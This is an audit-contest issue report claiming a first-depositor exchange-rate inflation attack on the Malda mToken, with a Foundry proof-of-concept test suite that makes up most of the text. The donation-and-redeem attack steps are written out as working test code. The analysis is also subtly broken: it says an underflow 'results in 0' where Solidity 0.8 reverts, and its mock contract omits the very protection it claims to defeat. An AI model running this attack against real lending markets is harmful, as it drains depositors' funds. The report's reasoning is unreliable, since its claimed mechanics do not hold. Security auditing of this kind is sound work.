### ISSUE TITLE
Recumbent Cobalt Frog - Attackers will steal all deposited funds from victims through exchange rate manipulation

### ISSUE THREAD

**Issue by sherlock-admin3** [sherlock-audit/2025-07-malda-judging#330]
Recumbent Cobalt Frog

High

# Attackers will steal all deposited funds from victims through exchange rate manipulation

### Summary

Insufficient first depositor protection will cause complete fund loss for subsequent depositors as attackers will exploit the fixed 1000 token anti-manipulation mechanism by inflating exchange rates through direct underlying token donations, causing victims to receive zero `mTokens` while losing their entire deposit.

### Root Cause

In mToken.sol:__mint() lines 703-707, the fixed anti-manipulation protection allocates exactly 1000 tokens to address(0) regardless of deposit size or exchange rate:

https://github.com/sherlock-audit/2025-07-malda/blob/main/malda-lending/src/mToken/mToken.sol#L703-L707

```solidity
if (totalSupply == 0) {
            totalSupply = 1000;
            accountTokens[address(0)] = 1000;
            mintTokens -= 1000;
        }
```

The choice to use a fixed 1000 token protection is a mistake as it becomes insufficient when exchange rates are inflated through large underlying token donations, allowing attackers to force victims' `mintTokens` calculation to result in fewer than 1000 tokens, causing them to receive zero tokens after the subtraction.

### Internal Pre-conditions

1. Market needs to be newly deployed or have `totalSupply` set to exactly 0
2. Attacker needs to be the first depositor with minimal amount (1 wei) to trigger the protection mechanism
3. Attacker needs to have sufficient underlying tokens for donation to inflate exchange rate above victim protection threshold
4. Victim needs to set `minAmountOut` to 0 or a value lower than expected tokens

### External Pre-conditions

1. Underlying token contract needs to allow direct transfers to the mToken contract without reverting
2. No other users need to call mint() between attacker's initial mint and donation phases

### Attack Path

1. Attacker calls `mint(1, attacker, 0)` with 1 wei underlying token to become first depositor
- Triggers anti-manipulation: `totalSupply = 1000`, `accountTokens[address(0)] = 1000`
- Attacker receives minimal or zero tokens due to `mintTokens -= 1000`

2. Attacker directly transfers large amount (e.g., 1000 ETH) to mToken contract via `underlying.transfer(mToken, donationAmount)`
- This inflates `_getCashPrior()` but doesn't change `totalSupply`
- Exchange rate becomes: `(1000 ETH + 1 wei) * 1e18 / 1000 ≈ 1e21 wei per token`

3. Victim calls `mint(500 ETH, victim, 0)` expecting to receive fair amount of tokens
- Calculation: `mintTokens = 500 ETH / 1e21 ≈ 500 tokens`
- After protection: `mintTokens = 500 - 1000 = 0` (underflow protection results in 0)
- Victim pays 500 ETH but receives 0 mTokens

4. Attacker calls `redeem()` to extract profit
- Redeems their minimal token balance for share of total underlying
- Gains portion of victim's deposited funds

### Impact

Victims suffer complete loss of their deposited funds (up to hundreds of ETH per victim). The attacker gains the majority of victims' deposits minus the temporary donation cost, resulting in profitable attacks with potential for 50%+ ROI per victim depending on donation recovery through subsequent redeems.
Multi-victim scenarios show total losses of 1500+ ETH across 3 victims in our proof-of-concept, with each victim receiving 0 tokens despite successful deposit transactions.

### PoC

```solidity
// SPDX-License-Identifier: MIT
pragma solidity =0.8.28;

import {Test} from "forge-std/Test.sol";
import {console} from "forge-std/console.sol";
import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol";

// Import base test
import "../../Base_Unit_Test.t.sol";

// Import Malda contracts (adjust paths based on actual structure)
// import {mErc20} from "../../../src/mToken/mErc20.sol";
// import {Operator} from "../../../src/Operator/Operator.sol";
// import {JumpRateModelV4} from "../../../src/interest/JumpRateModelV4.sol";

/**
 * @title Mock ERC20 Token for Testing
 * @dev Simple ERC20 implementation for testing purposes
 */
contract MockERC20 is ERC20 {
    constructor() ERC20("Mock Token", "MOCK") {}
    
    function mint(address to, uint256 amount) external {
        _mint(to, amount);
    }
    
    function burn(address from, uint256 amount) external {
        _burn(from, amount);
    }
}

/**
 * @title Mock mToken for Testing
 * @dev Mock implementation of mToken to test the first depositor attack
 */
contract MockMToken is ERC20 {
    IERC20 public underlying;
    uint256 private _totalUnderlying;
    uint256 public constant INITIAL_EXCHANGE_RATE = 1e18;
    
    constructor(address _underlying) ERC20("Mock mToken", "mMOCK") {
        underlying = IERC20(_underlying);
    }
    
    function mint(uint256 mintAmount, address to, uint256 minTokensOut) external returns (uint256) {
        require(mintAmount > 0, "Invalid mint amount");
        
        underlying.transferFrom(msg.sender, address(this), mintAmount);
        
        uint256 tokensToMint;
        if (totalSupply() == 0) {
            // First mint - vulnerable to attack
            tokensToMint = mintAmount;
        } else {
            // Calculate based on exchange rate
            tokensToMint = mintAmount * totalSupply() / getCash();
        }
        
        require(tokensToMint >= minTokensOut, "Insufficient tokens out");
        
        _mint(to, tokensToMint);
        _totalUnderlying += mintAmount;
        
        return tokensToMint;
    }
    
    function redeem(uint256 redeemTokens) external returns (uint256) {
        require(redeemTokens > 0, "Invalid redeem amount");
        require(balanceOf(msg.sender) >= redeemTokens, "Insufficient balance");
        
        uint256 redeemAmount = redeemTokens * getCash() / totalSupply();
        
        _burn(msg.sender, redeemTokens);
        underlying.transfer(msg.sender, redeemAmount);
        _totalUnderlying -= redeemAmount;
        
        return redeemAmount;
    }
    
    function getCash() public view returns (uint256) {
        return underlying.balanceOf(address(this));
    }
    
    function exchangeRateStored() public view returns (uint256) {
        if (totalSupply() == 0) {
            return INITIAL_EXCHANGE_RATE;
        }
        return getCash() * 1e18 / totalSupply();
    }
}

/**
 * @title First Depositor Attack Test Suite
 * @dev Tests for the critical first depositor/inflation attack vulnerability
 * @notice This test demonstrates how an attacker can steal funds from victims
 *         by manipulating the exchange rate during the first mint
 */
contract FirstDepositorAttackTest is Base_Unit_Test {
    // Test actors
    address attacker = address(0x1337);
    address victim = address(0xbabe);
    // Remove alice declaration since it's inherited from Base_Unit_Test
    
    // Mock contracts - replace with actual Malda contracts when available
    MockERC20 underlying;
    MockMToken mToken;
    // Operator operator;
    // JumpRateModelV4 interestModel;
    
    // Test constants
    uint256 constant INITIAL_BALANCE = 10000 ether;
    uint256 constant ATTACKER_MINT_AMOUNT = 1; // 1 wei - minimum possible
    uint256 constant DONATION_AMOUNT = 1000 ether; // Large donation to inflate rate
    uint256 constant VICTIM_MINT_AMOUNT = 500 ether; // Victim's deposit
    
    function setUp() public override {
        super.setUp(); // Call parent setUp
        
        // Setup mock underlying token
        underlying = new MockERC20();
        
        // Initialize mock mToken
        mToken = new MockMToken(address(underlying));
        
        // TODO: Initialize actual Malda contracts when ready
        // interestModel = new JumpRateModelV4(...);
        // operator = new Operator(...);
        // mToken = new mErc20();
        // mToken.initialize(...);
        
        // Give initial balances to test actors
        underlying.mint(attacker, INITIAL_BALANCE);
        underlying.mint(victim, INITIAL_BALANCE);
        underlying.mint(alice, INITIAL_BALANCE);
        
        // Label addresses for better trace output
        vm.label(attacker, "Attacker");
        vm.label(victim, "Victim");
        vm.label(alice, "Alice");
        vm.label(address(underlying), "UnderlyingToken");
        vm.label(address(mToken), "mToken");
    }
    
    /**
     * @dev Test the basic first depositor attack scenario
     * This test demonstrates the core vulnerability where attacker can steal victim funds
     */
    function test_FirstDepositorAttack_Basic() public {
        // Ensure market starts empty
        assertEq(mToken.totalSupply(), 0, "Market should start with zero supply");
        
        console.log("=== FIRST DEPOSITOR ATTACK TEST ===");
        console.log("Initial state:");
        console.log("mToken totalSupply:", mToken.totalSupply());
        console.log("mToken totalUnderlying:", mToken.getCash());
        
        // PHASE 1: Attacker becomes first depositor with minimal amount
        vm.startPrank(attacker);
        underlying.approve(address(mToken), ATTACKER_MINT_AMOUNT);
        
        console.log("\nPHASE 1: Attacker mints with minimal amount");
        console.log("Attacker mint amount:", ATTACKER_MINT_AMOUNT);
        
        // Record state before first mint
        uint256 attackerBalanceBefore = underlying.balanceOf(attacker);
        
        // Execute first mint
        mToken.mint(ATTACKER_MINT_AMOUNT, attacker, 0);
        
        // Check state after first mint
        uint256 totalSupplyAfterFirstMint = mToken.totalSupply();
        uint256 totalUnderlyingAfterFirstMint = mToken.getCash();
        uint256 attackerMTokenBalance = mToken.balanceOf(attacker);
        
        console.log("After first mint:");
        console.log("Total supply:", totalSupplyAfterFirstMint);
        console.log("Total underlying:", totalUnderlyingAfterFirstMint);
        console.log("Attacker mToken balance:", attackerMTokenBalance);
        
        vm.stopPrank();
        
        // PHASE 2: Attacker directly donates large amount to inflate exchange rate
        vm.startPrank(attacker);
        
        console.log("\nPHASE 2: Attacker donates large amount directly");
        console.log("Donation amount:", DONATION_AMOUNT);
        
        // Direct transfer to inflate exchange rate (NOT through mint function)
        underlying.transfer(address(mToken), DONATION_AMOUNT);
        
        // Check state after donation
        uint256 totalSupplyAfterDonation = mToken.totalSupply();
        uint256 totalUnderlyingAfterDonation = mToken.getCash();
        uint256 exchangeRateAfterDonation = mToken.exchangeRateStored();
        
        console.log("After donation:");
        console.log("Total supply:", totalSupplyAfterDonation);
        console.log("Total underlying:", totalUnderlyingAfterDonation);
        console.log("Exchange rate:", exchangeRateAfterDonation);
        
        vm.stopPrank();
        
        // PHASE 3: Victim attempts to mint, expecting fair treatment
        vm.startPrank(victim);
        underlying.approve(address(mToken), VICTIM_MINT_AMOUNT);
        
        console.log("\nPHASE 3: Victim mints large amount");
        console.log("Victim mint amount:", VICTIM_MINT_AMOUNT);
        
        uint256 victimUnderlyingBefore = underlying.balanceOf(victim);
        
        // Victim mint - this should result in very few or zero mTokens due to inflated rate
        mToken.mint(VICTIM_MINT_AMOUNT, victim, 0);
        
        uint256 victimUnderlyingAfter = underlying.balanceOf(victim);
        uint256 victimMTokenBalance = mToken.balanceOf(victim);
        uint256 victimUnderlyingSpent = victimUnderlyingBefore - victimUnderlyingAfter;
        
        console.log("After victim mint:");
        console.log("Victim underlying spent:", victimUnderlyingSpent);
        console.log("Victim mToken received:", victimMTokenBalance);
        console.log("Victim underlying balance:", victimUnderlyingAfter);
        
        vm.stopPrank();
        
        // PHASE 4: Attacker redeems to extract profit
        vm.startPrank(attacker);
        
        console.log("\nPHASE 4: Attacker redeems for profit");
        
        uint256 attackerUnderlyingBefore = underlying.balanceOf(attacker);
        uint256 attackerMTokenBalanceToRedeem = mToken.balanceOf(attacker);
        
        if (attackerMTokenBalanceToRedeem > 0) {
            mToken.redeem(attackerMTokenBalanceToRedeem);
        }
        
        uint256 attackerUnderlyingAfter = underlying.balanceOf(attacker);
        uint256 attackerProfit = attackerUnderlyingAfter - attackerUnderlyingBefore;
        
        console.log("Attacker profit:", attackerProfit);
        console.log("Attacker final balance:", attackerUnderlyingAfter);
        
        vm.stopPrank();
        
        // ASSERTIONS: Verify the attack succeeded
        console.log("\n=== ATTACK RESULTS ===");
        
        // Attacker should have profited significantly
        assertTrue(attackerProfit > 0, "Attacker should have made profit");
        
        // Victim should have received very few or zero mTokens despite paying full amount
        assertTrue(victimMTokenBalance < VICTIM_MINT_AMOUNT / 1000, "Victim should receive very few tokens");
        
        // The attack should be profitable (profit > costs)
        uint256 attackerTotalCost = ATTACKER_MINT_AMOUNT + DONATION_AMOUNT;
        assertTrue(attackerProfit + DONATION_AMOUNT > attackerTotalCost * 95 / 100, "Attack should be profitable");
        
        console.log("Attack cost:", attackerTotalCost);
        console.log("Attack profit + donation recovery:", attackerProfit + DONATION_AMOUNT);
        console.log("Attack success: Victim lost funds, attacker gained profit");
    }
    
    /**
     * @dev Test attack with multiple victims
     * Demonstrates how one attacker can steal from multiple subsequent depositors
     */
    function test_FirstDepositorAttack_MultipleVictims() public {
        // Similar setup to basic attack
        vm.startPrank(attacker);
        underlying.approve(address(mToken), ATTACKER_MINT_AMOUNT);
        mToken.mint(ATTACKER_MINT_AMOUNT, attacker, 0);
        underlying.transfer(address(mToken), DONATION_AMOUNT);
        vm.stopPrank();
        
        // Multiple victims try to mint
        address[] memory victims = new address[](3);
        victims[0] = victim;
        victims[1] = alice;
        victims[2] = address(0xdef1);
        
        uint256 totalVictimLoss = 0;
        
        for (uint i = 0; i < victims.length; i++) {
            underlying.mint(victims[i], VICTIM_MINT_AMOUNT);
            
            vm.startPrank(victims[i]);
            underlying.approve(address(mToken), VICTIM_MINT_AMOUNT);
            
            uint256 balanceBefore = underlying.balanceOf(victims[i]);
            mToken.mint(VICTIM_MINT_AMOUNT, victims[i], 0);
            uint256 balanceAfter = underlying.balanceOf(victims[i]);
            
            uint256 loss = balanceBefore - balanceAfter;
            totalVictimLoss += loss;
            
            console.log("Victim", i, "loss:", loss);
            vm.stopPrank();
        }
        
        console.log("Total victim losses:", totalVictimLoss);
        
        // Attacker redeems and should have profited from all victims
        vm.startPrank(attacker);
        uint256 attackerBalanceBefore = underlying.balanceOf(attacker);
        if (mToken.balanceOf(attacker) > 0) {
            mToken.redeem(mToken.balanceOf(attacker));
        }
        uint256 attackerBalanceAfter = underlying.balanceOf(attacker);
        uint256 attackerTotalProfit = attackerBalanceAfter - attackerBalanceBefore;
        
        console.log("Attacker total profit:", attackerTotalProfit);
        vm.stopPrank();
    }
    
    /**
     * @dev Test with different donation amounts
     * Shows how larger donations lead to more effective attacks
     */
    
    /**
     * @dev Test timing-based attack
     * Attacker front-runs victim's transaction
     */
    function test_FirstDepositorAttack_FrontRunning() public {
        // Simulate mempool scenario where attacker sees victim's transaction
        
        console.log("=== FRONT-RUNNING ATTACK TEST ===");
        
        // Victim submits transaction to mint (simulate pending in mempool)
        vm.startPrank(victim);
        underlying.approve(address(mToken), VICTIM_MINT_AMOUNT);
        vm.stopPrank();
        
        // Attacker sees the transaction and front-runs
        vm.startPrank(attacker);
        underlying.approve(address(mToken), ATTACKER_MINT_AMOUNT + DONATION_AMOUNT);
        
        // Attacker's front-running transaction executes first
        mToken.mint(ATTACKER_MINT_AMOUNT, attacker, 0);
        underlying.transfer(address(mToken), DONATION_AMOUNT);
        
        console.log("Attacker front-ran victim successfully");
        vm.stopPrank();
        
        // Now victim's transaction executes
        vm.startPrank(victim);
        uint256 victimBalanceBefore = underlying.balanceOf(victim);
        mToken.mint(VICTIM_MINT_AMOUNT, victim, 0);
        uint256 victimBalanceAfter = underlying.balanceOf(victim);
        
        console.log("Victim loss from front-running:", victimBalanceBefore - victimBalanceAfter);
        vm.stopPrank();
    }
    
    /**
     * @dev Helper function to demonstrate proper mitigation
     * This shows how the attack could be prevented
     */
    function test_ProposedMitigation() public {
        console.log("=== TESTING PROPOSED MITIGATION ===");
        
        // Proposed mitigation: Dynamic initial token allocation
        uint256 MINIMUM_MINT = 1000 ether; // Minimum deposit requirement
        uint256 INITIAL_TOKEN_MULTIPLIER = 1000; // Scale factor
        
        // Simulate improved mint function behavior
        vm.startPrank(attacker);
        
        // Attack should fail with minimum deposit requirement
        // vm.expectRevert("Below minimum mint");
        // mToken.mint(ATTACKER_MINT_AMOUNT, attacker, 0); // Should fail
        
        console.log("Attack prevented by minimum deposit requirement");
        
        // Even if attacker uses minimum amount
        underlying.approve(address(mToken), MINIMUM_MINT);
        uint256 initialTokensCalculated = sqrt(MINIMUM_MINT) * INITIAL_TOKEN_MULTIPLIER;
        
        console.log("With minimum deposit, initial tokens would be:", initialTokensCalculated);
        console.log("This makes donation attack much more expensive");
        
        vm.stopPrank();
    }
    
    /**
     * @dev Test edge cases and variations
     */
    function test_EdgeCases() public {
        // Test with fee-on-transfer tokens
        // Test with very small decimals underlying
        // Test with multiple attackers
        // Test with contract-based attackers
        
        console.log("=== EDGE CASES ===");
        console.log("Additional edge case tests would go here");
        console.log("- Fee-on-transfer underlying tokens");
        console.log("- Low decimal underlying tokens"); 
        console.log("- Multiple concurrent attackers");
        console.log("- Contract-based attack vectors");
    }
    
    // Helper function for square root (needed for mitigation testing)
    function sqrt(uint256 x) internal pure returns (uint256) {
        if (x == 0) return 0;
        uint256 z = (x + 1) / 2;
        uint256 y = x;
        while (z < y) {
            y = z;
            z = (x / z + z) / 2;
        }
        return y;
    }
}
```
